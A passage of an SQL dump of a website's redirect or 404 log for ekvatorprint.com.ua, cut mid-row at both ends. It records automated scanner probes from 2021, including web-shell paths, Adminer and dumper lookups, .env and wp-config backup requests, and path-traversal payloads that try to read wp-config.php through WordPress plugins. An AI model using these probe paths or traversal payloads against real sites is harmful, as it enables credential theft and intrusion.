00:00:00',301),(20173,'https://ekvatorprint.com.ua/wp-content/plugins/post-duplicator/m4c-postduplicator.php',NULL,'','',1,0,'2021-04-26 04:05:22','0000-00-00 00:00:00',301),(20174,'https://ekvatorprint.com.ua/admisistrator',NULL,'','',1,0,'2021-04-26 11:08:33','0000-00-00 00:00:00',301),(20175,'https://ekvatorprint.com.ua/price/index.php',NULL,'','',1,0,'2021-04-26 11:14:54','0000-00-00 00:00:00',301),(20176,'https://ekvatorprint.com.ua/new/wp-admin/setup-config.php?step=1',NULL,'','',1,0,'2021-04-27 05:31:12','0000-00-00 00:00:00',301),(20177,'https://ekvatorprint.com.ua/old-index.php',NULL,'','',39,0,'2021-04-28 01:05:55','0000-00-00 00:00:00',301),(20178,'https://ekvatorprint.com.ua/trebovaniya/templates/gk_ilife/favicon.ico',NULL,'','',2,0,'2021-04-28 07:28:18','0000-00-00 00:00:00',301),(20179,'https://ekvatorprint.com.ua/adminer-4.7.7.php',NULL,'','',1,0,'2021-04-28 11:55:35','0000-00-00 00:00:00',301),(20180,'https://ekvatorprint.com.ua/adminer-4.7.7-en.php',NULL,'','',1,0,'2021-04-28 11:55:35','0000-00-00 00:00:00',301),(20181,'https://ekvatorprint.com.ua/adminer-4.7.7-mysql.php',NULL,'','',1,0,'2021-04-28 11:55:35','0000-00-00 00:00:00',301),(20182,'https://ekvatorprint.com.ua/adminer-4.7.7-mysql-en.php',NULL,'','',1,0,'2021-04-28 11:55:36','0000-00-00 00:00:00',301),(20183,'https://ekvatorprint.com.ua/adminer-4.7.6.php',NULL,'','',1,0,'2021-04-28 11:55:36','0000-00-00 00:00:00',301),(20184,'https://ekvatorprint.com.ua/adminer-4.7.6-en.php',NULL,'','',1,0,'2021-04-28 11:55:36','0000-00-00 00:00:00',301),(20185,'https://ekvatorprint.com.ua/adminer-4.7.6-mysql.php',NULL,'','',1,0,'2021-04-28 11:55:36','0000-00-00 00:00:00',301),(20186,'https://ekvatorprint.com.ua/adminer-4.7.6-mysql-en.php',NULL,'','',1,0,'2021-04-28 11:55:37','0000-00-00 00:00:00',301),(20187,'https://ekvatorprint.com.ua/adminer-4.7.5.php',NULL,'','',1,0,'2021-04-28 11:55:37','0000-00-00 00:00:00',301),(20188,'https://ekvatorprint.com.ua/adminer-4.7.5-en.php',NULL,'','',1,0,'2021-04-28 11:55:37','0000-00-00 00:00:00',301),(20189,'https://ekvatorprint.com.ua/adminer-4.7.5-mysql.php',NULL,'','',1,0,'2021-04-28 11:55:38','0000-00-00 00:00:00',301),(20190,'https://ekvatorprint.com.ua/adminer-4.7.5-mysql-en.php',NULL,'','',1,0,'2021-04-28 11:55:38','0000-00-00 00:00:00',301),(20191,'https://ekvatorprint.com.ua/adminer-4.7.4.php',NULL,'','',1,0,'2021-04-28 11:55:38','0000-00-00 00:00:00',301),(20192,'https://ekvatorprint.com.ua/adminer-4.7.4-en.php',NULL,'','',1,0,'2021-04-28 11:55:38','0000-00-00 00:00:00',301),(20193,'https://ekvatorprint.com.ua/adminer-4.7.4-mysql.php',NULL,'','',1,0,'2021-04-28 11:55:39','0000-00-00 00:00:00',301),(20194,'https://ekvatorprint.com.ua/adminer-4.7.4-mysql-en.php',NULL,'','',1,0,'2021-04-28 11:55:39','0000-00-00 00:00:00',301),(20195,'https://ekvatorprint.com.ua/adminer-4.7.3.php',NULL,'','',1,0,'2021-04-28 11:55:39','0000-00-00 00:00:00',301),(20196,'https://ekvatorprint.com.ua/adminer-4.7.3-en.php',NULL,'','',1,0,'2021-04-28 11:55:39','0000-00-00 00:00:00',301),(20197,'https://ekvatorprint.com.ua/adminer-4.7.3-mysql.php',NULL,'','',1,0,'2021-04-28 11:55:40','0000-00-00 00:00:00',301),(20198,'https://ekvatorprint.com.ua/adminer-4.7.3-mysql-en.php',NULL,'','',1,0,'2021-04-28 11:55:40','0000-00-00 00:00:00',301),(20199,'https://ekvatorprint.com.ua/adminer-4.7.2.php',NULL,'','',1,0,'2021-04-28 11:55:40','0000-00-00 00:00:00',301),(20200,'https://ekvatorprint.com.ua/adminer-4.7.2-en.php',NULL,'','',1,0,'2021-04-28 11:55:40','0000-00-00 00:00:00',301),(20201,'https://ekvatorprint.com.ua/adminer-4.7.2-mysql.php',NULL,'','',1,0,'2021-04-28 11:55:41','0000-00-00 00:00:00',301),(20202,'https://ekvatorprint.com.ua/adminer-4.7.2-mysql-en.php',NULL,'','',1,0,'2021-04-28 11:55:41','0000-00-00 00:00:00',301),(20203,'https://ekvatorprint.com.ua/adminer-4.7.1.php',NULL,'','',1,0,'2021-04-28 11:55:41','0000-00-00 00:00:00',301),(20204,'https://ekvatorprint.com.ua/adminer-4.7.1-en.php',NULL,'','',1,0,'2021-04-28 11:55:42','0000-00-00 00:00:00',301),(20205,'https://ekvatorprint.com.ua/adminer-4.7.1-mysql.php',NULL,'','',1,0,'2021-04-28 11:55:42','0000-00-00 00:00:00',301),(20206,'https://ekvatorprint.com.ua/adminer-4.7.1-mysql-en.php',NULL,'','',1,0,'2021-04-28 11:55:42','0000-00-00 00:00:00',301),(20207,'https://ekvatorprint.com.ua/adminer-4.7.0.php',NULL,'','',1,0,'2021-04-28 11:55:42','0000-00-00 00:00:00',301),(20208,'https://ekvatorprint.com.ua/adminer-4.7.0-en.php',NULL,'','',1,0,'2021-04-28 11:55:43','0000-00-00 00:00:00',301),(20209,'https://ekvatorprint.com.ua/adminer-4.7.0-mysql.php',NULL,'','',1,0,'2021-04-28 11:55:43','0000-00-00 00:00:00',301),(20210,'https://ekvatorprint.com.ua/adminer-4.7.0-mysql-en.php',NULL,'','',1,0,'2021-04-28 11:55:43','0000-00-00 00:00:00',301),(20211,'https://ekvatorprint.com.ua/adminer-4.6.3.php',NULL,'','',1,0,'2021-04-28 11:55:43','0000-00-00 00:00:00',301),(20212,'https://ekvatorprint.com.ua/adminer-4.6.3-en.php',NULL,'','',1,0,'2021-04-28 11:55:44','0000-00-00 00:00:00',301),(20213,'https://ekvatorprint.com.ua/adminer-4.6.3-mysql.php',NULL,'','',1,0,'2021-04-28 11:55:44','0000-00-00 00:00:00',301),(20214,'https://ekvatorprint.com.ua/adminer-4.6.3-mysql-en.php',NULL,'','',1,0,'2021-04-28 11:55:44','0000-00-00 00:00:00',301),(20215,'https://ekvatorprint.com.ua/adminer-4.6.2-en.php',NULL,'','',1,0,'2021-04-28 11:55:45','0000-00-00 00:00:00',301),(20216,'https://ekvatorprint.com.ua/adminer-4.6.2-mysql-en.php',NULL,'','',1,0,'2021-04-28 11:55:45','0000-00-00 00:00:00',301),(20217,'https://ekvatorprint.com.ua/adminer-4.6.1-en.php',NULL,'','',1,0,'2021-04-28 11:55:46','0000-00-00 00:00:00',301),(20218,'https://ekvatorprint.com.ua/adminer-4.6.1-mysql.php',NULL,'','',1,0,'2021-04-28 11:55:46','0000-00-00 00:00:00',301),(20219,'https://ekvatorprint.com.ua/adminer-4.6.1-mysql-en.php',NULL,'','',1,0,'2021-04-28 11:55:46','0000-00-00 00:00:00',301),(20220,'https://ekvatorprint.com.ua/adminer-4.6.0-en.php',NULL,'','',1,0,'2021-04-28 11:55:47','0000-00-00 00:00:00',301),(20221,'https://ekvatorprint.com.ua/adminer-4.6.0-mysql.php',NULL,'','',1,0,'2021-04-28 11:55:47','0000-00-00 00:00:00',301),(20222,'https://ekvatorprint.com.ua/adminer-4.6.0-mysql-en.php',NULL,'','',1,0,'2021-04-28 11:55:47','0000-00-00 00:00:00',301),(20223,'https://ekvatorprint.com.ua/adminer-4.5.0-en.php',NULL,'','',1,0,'2021-04-28 11:55:48','0000-00-00 00:00:00',301),(20224,'https://ekvatorprint.com.ua/adminer-4.5.0-mysql.php',NULL,'','',1,0,'2021-04-28 11:55:48','0000-00-00 00:00:00',301),(20225,'https://ekvatorprint.com.ua/adminer-4.5.0-mysql-en.php',NULL,'','',1,0,'2021-04-28 11:55:48','0000-00-00 00:00:00',301),(20226,'https://ekvatorprint.com.ua/adminer-4.4.0-en.php',NULL,'','',1,0,'2021-04-28 11:55:50','0000-00-00 00:00:00',301),(20227,'https://ekvatorprint.com.ua/adminer-4.4.0-mysql.php',NULL,'','',1,0,'2021-04-28 11:55:50','0000-00-00 00:00:00',301),(20228,'https://ekvatorprint.com.ua/adminer-4.4.0-mysql-en.php',NULL,'','',1,0,'2021-04-28 11:55:50','0000-00-00 00:00:00',301),(20229,'https://ekvatorprint.com.ua/adminer-4.2.5-mysql-en.php',NULL,'','',1,0,'2021-04-28 11:55:52','0000-00-00 00:00:00',301),(20230,'https://ekvatorprint.com.ua/cache/copyhold/th3_alpha.php?upload=hidden',NULL,'','',2,0,'2021-04-29 18:21:14','0000-00-00 00:00:00',301),(20231,'https://ekvatorprint.com.ua/cache/outcut/th3_alpha.php?upload=hidden',NULL,'','',2,0,'2021-04-29 20:46:37','0000-00-00 00:00:00',301),(20232,'https://ekvatorprint.com.ua/cache/spouty/th3_alpha.php?upload=hidden',NULL,'','',2,0,'2021-04-29 23:38:13','0000-00-00 00:00:00',301),(20233,'https://ekvatorprint.com.ua/cache/medianity/th3_alpha.php?upload=hidden',NULL,'','',2,0,'2021-04-30 01:25:51','0000-00-00 00:00:00',301),(20234,'https://ekvatorprint.com.ua/cache/s_e.php',NULL,'','',2,0,'2021-04-30 06:52:54','0000-00-00 00:00:00',301),(20235,'https://ekvatorprint.com.ua/5c2gzagkykusj0b/twzwlxnscdrfomrahss/edmmvtuwfmpyz52m17/sgg3s5pocxrivuoaaest/clzgxcevoaoimy',NULL,'','',1,0,'2021-04-30 10:02:36','0000-00-00 00:00:00',301),(20236,'https://ekvatorprint.com.ua/fjwil1kauzigtx6os6uauivtumydqlil.cdn-freehost.com.ua/images/thumbnails/images/stories/vinil-s-fill-92x120.jpg',NULL,'https://ekvatorprint.com.ua/','',1,0,'2021-04-30 10:29:53','0000-00-00 00:00:00',301),(20237,'https://ekvatorprint.com.ua/cache/mainview/th3_alpha.php?upload=hidden',NULL,'','',2,0,'2021-04-30 10:36:53','0000-00-00 00:00:00',301),(20238,'https://ekvatorprint.com.ua/cache/unadjustably/th3_alpha.php?upload=hidden',NULL,'','',2,0,'2021-04-30 14:45:48','0000-00-00 00:00:00',301),(20239,'https://ekvatorprint.com.ua/cache/subfusiform/th3_alpha.php?upload=hidden',NULL,'','',2,0,'2021-04-30 18:18:07','0000-00-00 00:00:00',301),(20240,'https://ekvatorprint.com.ua/cache/s_ne.php',NULL,'','',2,0,'2021-05-01 10:57:11','0000-00-00 00:00:00',301),(20241,'https://ekvatorprint.com.ua/wp—admin/admin—ajax.php?action=duplicator_download&file=/../wp-config.php',NULL,'http://ekvatorprint.com.ua/wp%E2%80%94admin/admin%E2%80%94ajax.php?action=duplicator_download&file=/../wp-config.php','',1,0,'2021-05-01 14:19:13','0000-00-00 00:00:00',301),(20242,'https://ekvatorprint.com.ua/wp-config.php.4',NULL,'http://ekvatorprint.com.ua/wp-config.php.4','',2,0,'2021-05-01 14:19:13','0000-00-00 00:00:00',301),(20243,'https://ekvatorprint.com.ua/wp-config.php.3',NULL,'http://ekvatorprint.com.ua/wp-config.php.3','',2,0,'2021-05-01 14:19:13','0000-00-00 00:00:00',301),(20244,'https://ekvatorprint.com.ua/wp-config.php.8',NULL,'http://ekvatorprint.com.ua/wp-config.php.8','',2,0,'2021-05-01 14:19:13','0000-00-00 00:00:00',301),(20245,'https://ekvatorprint.com.ua/wp-license.php?file=../..//wp-config',NULL,'http://ekvatorprint.com.ua/wp-license.php?file=../..//wp-config','',1,0,'2021-05-01 14:19:14','0000-00-00 00:00:00',301),(20246,'https://ekvatorprint.com.ua/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php','',1,0,'2021-05-01 14:19:14','0000-00-00 00:00:00',301),(20247,'https://ekvatorprint.com.ua/wp-config.php.bk',NULL,'http://ekvatorprint.com.ua/wp-config.php.bk','',2,0,'2021-05-01 14:19:14','0000-00-00 00:00:00',301),(20248,'https://ekvatorprint.com.ua/wp-config.php.b',NULL,'http://ekvatorprint.com.ua/wp-config.php.b','',2,0,'2021-05-01 14:19:14','0000-00-00 00:00:00',301),(20249,'https://ekvatorprint.com.ua/wp-config.php.0',NULL,'http://ekvatorprint.com.ua/wp-config.php.0','',2,0,'2021-05-01 14:19:14','0000-00-00 00:00:00',301),(20250,'https://ekvatorprint.com.ua/wp-config.php.5',NULL,'http://ekvatorprint.com.ua/wp-config.php.5','',2,0,'2021-05-01 14:19:14','0000-00-00 00:00:00',301),(20251,'https://ekvatorprint.com.ua/sxd/sxd.js',NULL,'http://ekvatorprint.com.ua/sxd/sxd.js','',1,0,'2021-05-01 21:51:41','0000-00-00 00:00:00',301),(20252,'https://ekvatorprint.com.ua/sypexdumper/sxd/sxd.js',NULL,'http://ekvatorprint.com.ua/SypexDumper/sxd/sxd.js','',1,0,'2021-05-01 21:51:42','0000-00-00 00:00:00',301),(20253,'https://ekvatorprint.com.ua/dumper/sxd.js',NULL,'http://ekvatorprint.com.ua/dumper/sxd.js','',1,0,'2021-05-01 21:51:42','0000-00-00 00:00:00',301),(20254,'https://ekvatorprint.com.ua/admin/dumper/sxd.js',NULL,'http://ekvatorprint.com.ua/admin/dumper/sxd.js','',1,0,'2021-05-01 21:51:43','0000-00-00 00:00:00',301),(20255,'https://ekvatorprint.com.ua/admin/sxd/sxd.js',NULL,'http://ekvatorprint.com.ua/admin/sxd/sxd.js','',1,0,'2021-05-01 21:51:43','0000-00-00 00:00:00',301),(20256,'https://ekvatorprint.com.ua/backup/sxd/sxd.js',NULL,'http://ekvatorprint.com.ua/backup/sxd/sxd.js','',1,0,'2021-05-01 21:51:44','0000-00-00 00:00:00',301),(20257,'https://ekvatorprint.com.ua/dump/sxd.js',NULL,'http://ekvatorprint.com.ua/dump/sxd.js','',1,0,'2021-05-01 21:51:44','0000-00-00 00:00:00',301),(20258,'https://ekvatorprint.com.ua/cache/nonanonymity/th3_alpha.php?upload=hidden',NULL,'','',2,0,'2021-05-02 01:27:29','0000-00-00 00:00:00',301),(20259,'https://ekvatorprint.com.ua/cache/communicatory/th3_alpha.php?upload=hidden',NULL,'','',2,0,'2021-05-02 05:29:02','0000-00-00 00:00:00',301),(20260,'https://ekvatorprint.com.ua/cache/generic/th3_alpha.php?upload=hidden',NULL,'','',2,0,'2021-05-02 20:54:58','0000-00-00 00:00:00',301),(20261,'https://ekvatorprint.com.ua/accesson0.php',NULL,'','',3,0,'2021-05-04 12:57:33','0000-00-00 00:00:00',301),(20262,'https://ekvatorprint.com.ua/s_ne.php',NULL,'','',20,0,'2021-05-05 23:02:07','0000-00-00 00:00:00',301),(20263,'https://ekvatorprint.com.ua/wp_wrong_datlib.php',NULL,'','',30,0,'2021-05-06 09:14:19','0000-00-00 00:00:00',301),(20264,'https://ekvatorprint.com.ua/cache/eleutherozoan/th3_alpha.php?upload=hidden',NULL,'','',2,0,'2021-05-07 11:26:08','0000-00-00 00:00:00',301),(20265,'https://ekvatorprint.com.ua/cache/enarthrosis/th3_alpha.php?upload=hidden',NULL,'','',2,0,'2021-05-07 20:36:21','0000-00-00 00:00:00',301),(20266,'https://ekvatorprint.com.ua/cache/copyhold/th3_ent1ty.php?upload=hidden',NULL,'','',2,0,'2021-05-08 05:30:08','0000-00-00 00:00:00',301),(20267,'https://ekvatorprint.com.ua/assets/images/accesson0.php',NULL,'','',3,0,'2021-05-08 16:41:18','0000-00-00 00:00:00',301),(20268,'https://ekvatorprint.com.ua/assets/images/s_e.php',NULL,'','',5,0,'2021-05-10 10:44:50','0000-00-00 00:00:00',301),(20269,'https://ekvatorprint.com.ua/assets/images/s_ne.php',NULL,'','',4,0,'2021-05-11 22:06:20','0000-00-00 00:00:00',301),(20270,'https://ekvatorprint.com.ua/dup-installer/main.installer.php',NULL,'http://ekvatorprint.com.ua/dup-installer/main.installer.php','',10,0,'2021-05-13 07:21:16','0000-00-00 00:00:00',301),(20271,'https://ekvatorprint.com.ua/idx_config/',NULL,'','',1,0,'2021-05-13 18:49:08','0000-00-00 00:00:00',301),(20272,'https://ekvatorprint.com.ua/telescope/requests',NULL,'','',2,0,'2021-05-13 18:49:09','0000-00-00 00:00:00',301),(20273,'https://ekvatorprint.com.ua/v2/_catalog',NULL,'','',2,0,'2021-05-13 18:49:10','0000-00-00 00:00:00',301),(20274,'https://ekvatorprint.com.ua/api/search?folderids=0',NULL,'','',2,0,'2021-05-13 18:49:11','0000-00-00 00:00:00',301),(20275,'https://ekvatorprint.com.ua/config.json',NULL,'','',3,0,'2021-05-13 18:49:12','0000-00-00 00:00:00',301),(20276,'https://ekvatorprint.com.ua/env/.env',NULL,'','',6,0,'2021-05-14 17:17:15','0000-00-00 00:00:00',301),(20277,'https://ekvatorprint.com.ua/local.env',NULL,'','',5,0,'2021-05-14 17:17:17','0000-00-00 00:00:00',301),(20278,'https://ekvatorprint.com.ua/cms/.env',NULL,'','',5,0,'2021-05-14 17:17:19','0000-00-00 00:00:00',301),(20279,'https://ekvatorprint.com.ua/printing-...',NULL,'','',1,0,'2021-05-17 09:31:41','0000-00-00 00:00:00',301),(20280,'https://ekvatorprint.com.ua/wp-includes/dcomay.php',NULL,'http://ekvatorprint.com.ua/wp-includes/dcomay.php','',2,0,'2021-05-17 20:51:23','0000-00-00 00:00:00',301),(20281,'https://ekvatorprint.com.ua/wp-content/themes/alternate-lite/inc/network.php',NULL,'http://ekvatorprint.com.ua/wp-content/themes/alternate-lite/inc/network.php','',1,0,'2021-05-17 20:52:08','0000-00-00 00:00:00',301),(20282,'https://ekvatorprint.com.ua/wp-content/uploads/estate_templates/doc.php',NULL,'http://ekvatorprint.com.ua/wp-content/uploads/estate_templates/doc.php','',2,0,'2021-05-17 22:28:33','0000-00-00 00:00:00',301),(20283,'https://ekvatorprint.com.ua/wp-content/plugins/sid/sidwso.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/sid/sidwso.php','',2,0,'2021-05-18 09:17:51','0000-00-00 00:00:00',301),(20284,'https://ekvatorprint.com.ua/wp-content/upgrade/theme-compat/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/wp-content/upgrade/theme-compat/popup-pomo.php','',2,0,'2021-05-18 10:47:08','0000-00-00 00:00:00',301),(20285,'https://ekvatorprint.com.ua/wp-content/uploads/estate_templates/wp-rentals-demo.php',NULL,'http://ekvatorprint.com.ua/wp-content/uploads/estate_templates/wp-rentals-demo.php','',1,0,'2021-05-18 11:38:41','0000-00-00 00:00:00',301),(20286,'https://ekvatorprint.com.ua/wp-content/plugins/404.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/404.php','',1,0,'2021-05-18 14:38:54','0000-00-00 00:00:00',301),(20287,'https://ekvatorprint.com.ua/wp-admin/includes/class-wp-filesystem-import.php',NULL,'http://ekvatorprint.com.ua/wp-admin/includes/class-wp-filesystem-import.php','',1,0,'2021-05-18 15:03:16','0000-00-00 00:00:00',301),(20288,'https://ekvatorprint.com.ua/wp-content/plugins/google-sitemap-generator/img/funjr.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/google-sitemap-generator/img/funjr.php','',1,0,'2021-05-18 16:38:45','0000-00-00 00:00:00',301),(20289,'https://ekvatorprint.com.ua/wp-content/plugins/akismet/views/title.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/akismet/views/title.php','',1,0,'2021-05-18 16:47:56','0000-00-00 00:00:00',301),(20290,'https://ekvatorprint.com.ua/wp-admin/admin.php',NULL,'http://ekvatorprint.com.ua/wp-admin/admin.php','',2,0,'2021-05-19 07:55:59','0000-00-00 00:00:00',301),(20291,'https://ekvatorprint.com.ua/wp-content/plugins/akismet/views/predefined.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/akismet/views/predefined.php','',1,0,'2021-05-19 07:57:19','0000-00-00 00:00:00',301),(20292,'https://ekvatorprint.com.ua/wp-includes/theme-compat/images.php',NULL,'http://ekvatorprint.com.ua/wp-includes/theme-compat/images.php','',1,0,'2021-05-19 08:28:50','0000-00-00 00:00:00',301),(20293,'https://ekvatorprint.com.ua/wp-content/plugins/contact-form-7/includes/mini.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/contact-form-7/includes/mini.php','',2,0,'2021-05-19 08:46:14','0000-00-00 00:00:00',301),(20294,'https://ekvatorprint.com.ua/wp-content/plugins/akismet/views/activate.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/akismet/views/activate.php','',1,0,'2021-05-19 09:00:38','0000-00-00 00:00:00',301),(20295,'https://ekvatorprint.com.ua/wp-content/themes/twentysixteen/404.php',NULL,'http://ekvatorprint.com.ua/wp-content/themes/twentysixteen/404.php','',1,0,'2021-05-19 09:00:49','0000-00-00 00:00:00',301),(20296,'https://ekvatorprint.com.ua/wp-content/uploads/2020/07/doc.php',NULL,'http://ekvatorprint.com.ua/wp-content/uploads/2020/07/doc.php','',1,0,'2021-05-19 09:16:54','0000-00-00 00:00:00',301),(20297,'https://ekvatorprint.com.ua/cmd.php',NULL,'http://ekvatorprint.com.ua/cmd.php','',3,0,'2021-05-19 10:02:00','0000-00-00 00:00:00',301),(20298,'https://ekvatorprint.com.ua/wp-content/uploads/content-post.php',NULL,'http://ekvatorprint.com.ua/wp-content/uploads/content-post.php','',1,0,'2021-05-19 10:04:23','0000-00-00 00:00:00',301),(20299,'https://ekvatorprint.com.ua/wp-content/themes/twentyfifteen/404.php',NULL,'http://ekvatorprint.com.ua/wp-content/themes/twentyfifteen/404.php','',1,0,'2021-05-19 11:13:53','0000-00-00 00:00:00',301),(20300,'https://ekvatorprint.com.ua/wp-admin/network/profile.php',NULL,'http://ekvatorprint.com.ua/wp-admin/network/profile.php','',2,0,'2021-05-19 12:12:15','0000-00-00 00:00:00',301),(20301,'https://ekvatorprint.com.ua/wp-content/plugins/akismet/class.akismet-admin.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/akismet/class.akismet-admin.php','',2,0,'2021-05-19 12:21:39','0000-00-00 00:00:00',301),(20302,'https://ekvatorprint.com.ua/wp-admin/maint/repair.php',NULL,'http://ekvatorprint.com.ua/wp-admin/maint/repair.php','',1,0,'2021-05-19 12:43:37','0000-00-00 00:00:00',301),(20303,'https://ekvatorprint.com.ua/wp-content/plugins/unicode/w.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/unicode/w.php','',1,0,'2021-05-19 15:07:04','0000-00-00 00:00:00',301),(20304,'https://ekvatorprint.com.ua/wp-content/plugins/easyrotator-for-wordpress/wj.php.suspected',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/easyrotator-for-wordpress/wj.php.suspected','',1,0,'2021-05-19 18:13:48','0000-00-00 00:00:00',301),(20305,'https://ekvatorprint.com.ua/wp-content/themes/integer/system.php',NULL,'http://ekvatorprint.com.ua/wp-content/themes/integer/system.php','',1,0,'2021-05-19 20:48:51','0000-00-00 00:00:00',301),(20306,'https://ekvatorprint.com.ua/wp-admin/user/profile.php',NULL,'http://ekvatorprint.com.ua/wp-admin/user/profile.php','',1,0,'2021-05-19 20:58:45','0000-00-00 00:00:00',301),(20307,'https://ekvatorprint.com.ua/wp-content/plugins/akismet/class.akismet-cli.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/akismet/class.akismet-cli.php','',2,0,'2021-05-19 21:53:44','0000-00-00 00:00:00',301),(20308,'https://ekvatorprint.com.ua/wp-admin/link.php',NULL,'http://ekvatorprint.com.ua/wp-admin/link.php','',1,0,'2021-05-19 22:24:32','0000-00-00 00:00:00',301),(20309,'https://ekvatorprint.com.ua/wp-content/plugins/coloros/weblinks.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/coloros/weblinks.php','',1,0,'2021-05-19 22:37:25','0000-00-00 00:00:00',301),(20310,'https://ekvatorprint.com.ua/wp-content/themes/fincorp/about3.php',NULL,'http://ekvatorprint.com.ua/wp-content/themes/fincorp/about3.php','',2,0,'2021-05-20 04:29:53','0000-00-00 00:00:00',301),(20311,'https://ekvatorprint.com.ua/wp-content/themes/alternate-lite/inc/niko.php',NULL,'http://ekvatorprint.com.ua/wp-content/themes/alternate-lite/inc/niko.php','',1,0,'2021-05-20 07:24:58','0000-00-00 00:00:00',301),(20312,'https://ekvatorprint.com.ua/wp-content/plugins/cherry-plugin/admin/css/tinymce-shortcodes.css',NULL,'http://www.google.com/','',2,0,'2021-05-28 02:22:06','0000-00-00 00:00:00',301),(20313,'https://ekvatorprint.com.ua/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=upload.php',NULL,'http://www.google.com/','',2,0,'2021-05-29 02:02:04','0000-00-00 00:00:00',301),(20314,'https://ekvatorprint.com.ua/shl.php',NULL,'http://ekvatorprint.com.ua/shl.php','',1,0,'2021-05-30 20:58:51','0000-00-00 00:00:00',301),(20315,'https://ekvatorprint.com.ua/admin/dumper.php',NULL,'http://ekvatorprint.com.ua/admin/dumper.php','',1,0,'2021-05-30 20:58:51','0000-00-00 00:00:00',301),(20316,'https://ekvatorprint.com.ua/backup/dumper.php',NULL,'http://ekvatorprint.com.ua/backup/dumper.php','',1,0,'2021-05-30 20:58:52','0000-00-00 00:00:00',301),(20317,'https://ekvatorprint.com.ua/db/dumper.php',NULL,'http://ekvatorprint.com.ua/db/dumper.php','',1,0,'2021-05-30 20:58:52','0000-00-00 00:00:00',301),(20318,'https://ekvatorprint.com.ua/dump/dumper.php',NULL,'http://ekvatorprint.com.ua/dump/dumper.php','',1,0,'2021-05-30 20:58:53','0000-00-00 00:00:00',301),(20319,'https://ekvatorprint.com.ua/dumper.php',NULL,'http://ekvatorprint.com.ua/dumper.php','',2,0,'2021-05-30 20:58:53','0000-00-00 00:00:00',301),(20320,'https://ekvatorprint.com.ua/dumper/dumper.php',NULL,'http://ekvatorprint.com.ua/dumper/dumper.php','',1,0,'2021-05-30 20:58:54','0000-00-00 00:00:00',301),(20321,'https://ekvatorprint.com.ua/sxd/index.php',NULL,'http://ekvatorprint.com.ua/sxd/index.php','',1,0,'2021-05-30 20:58:54','0000-00-00 00:00:00',301),(20322,'https://ekvatorprint.com.ua/sypex/dumper.php',NULL,'http://ekvatorprint.com.ua/sypex/dumper.php','',1,0,'2021-05-30 20:58:55','0000-00-00 00:00:00',301),(20323,'https://ekvatorprint.com.ua/admin/assets/plugins/jquery-file-upload/server/php/',NULL,'http://ekvatorprint.com.ua/admin/assets/plugins/jquery-file-upload/server/php/','',9,0,'2021-06-03 12:47:16','0000-00-00 00:00:00',301),(20324,'https://ekvatorprint.com.ua/admin/assets/global/plugins/jquery-file-upload/server/php/',NULL,'http://ekvatorprint.com.ua/admin/assets/global/plugins/jquery-file-upload/server/php/','',1,0,'2021-06-03 12:55:00','0000-00-00 00:00:00',301),(20325,'https://ekvatorprint.com.ua/banner-printing/banner-printing',NULL,'','',2,0,'2021-06-04 09:59:52','0000-00-00 00:00:00',301),(20326,'https://ekvatorprint.com.ua/archivarix.cms.php',NULL,'','',3,0,'2021-06-04 10:36:19','0000-00-00 00:00:00',301),(20327,'https://ekvatorprint.com.ua/components/com_simplephotogallery/lib/uploadfile.php',NULL,'http://www.google.com/','',1,0,'2021-06-06 01:45:49','0000-00-00 00:00:00',301),(20328,'https://ekvatorprint.com.ua/wp-includes/js/tw-sack.js',NULL,'','',1,0,'2021-06-06 17:04:50','0000-00-00 00:00:00',301),(20329,'https://ekvatorprint.com.ua/misc/textarea.js',NULL,'','',1,0,'2021-06-06 17:11:36','0000-00-00 00:00:00',301),(20330,'https://ekvatorprint.com.ua/js/login.js',NULL,'','',1,0,'2021-06-06 17:13:53','0000-00-00 00:00:00',301),(20331,'https://ekvatorprint.com.ua/js/vbcache.js',NULL,'','',1,0,'2021-06-06 17:20:24','0000-00-00 00:00:00',301),(20332,'https://ekvatorprint.com.ua/admin/view/javascript/font-awesome/less/path.less',NULL,'','',1,0,'2021-06-06 17:22:10','0000-00-00 00:00:00',301),(20333,'https://ekvatorprint.com.ua/laravel/core/.env',NULL,'','',1,0,'2021-06-07 17:20:36','0000-00-00 00:00:00',301),(20334,'https://ekvatorprint.com.ua/beta/.env',NULL,'','',1,0,'2021-06-07 17:20:57','0000-00-00 00:00:00',301),(20335,'https://ekvatorprint.com.ua/kyc/.env',NULL,'','',1,0,'2021-06-07 17:21:30','0000-00-00 00:00:00',301),(20336,'https://ekvatorprint.com.ua/prod/.env',NULL,'','',2,0,'2021-06-07 17:23:23','0000-00-00 00:00:00',301),(20337,'https://ekvatorprint.com.ua/index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image',NULL,'http://ekvatorprint.com.ua/index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image','',1,0,'2021-06-07 17:55:38','0000-00-00 00:00:00',301),(20338,'https://ekvatorprint.com.ua/via_inject_blocker.css',NULL,'','',1,0,'2021-06-07 20:00:16','0000-00-00 00:00:00',301),(20339,'https://ekvatorprint.com.ua/semalt.com',NULL,'https://www.bing.com/search?q=semalt.com','',4,0,'2021-06-09 14:35:26','0000-00-00 00:00:00',301),(20340,'https://ekvatorprint.com.ua/myadmin/',NULL,'','',2,0,'2021-06-09 18:47:34','0000-00-00 00:00:00',301),(20341,'https://ekvatorprint.com.ua/sql/',NULL,'','',2,0,'2021-06-09 18:47:34','0000-00-00 00:00:00',301),(20342,'https://ekvatorprint.com.ua/mysqladmin/',NULL,'','',2,0,'2021-06-09 18:47:36','0000-00-00 00:00:00',301),(20343,'https://ekvatorprint.com.ua/db/',NULL,'','',3,0,'2021-06-09 18:47:37','0000-00-00 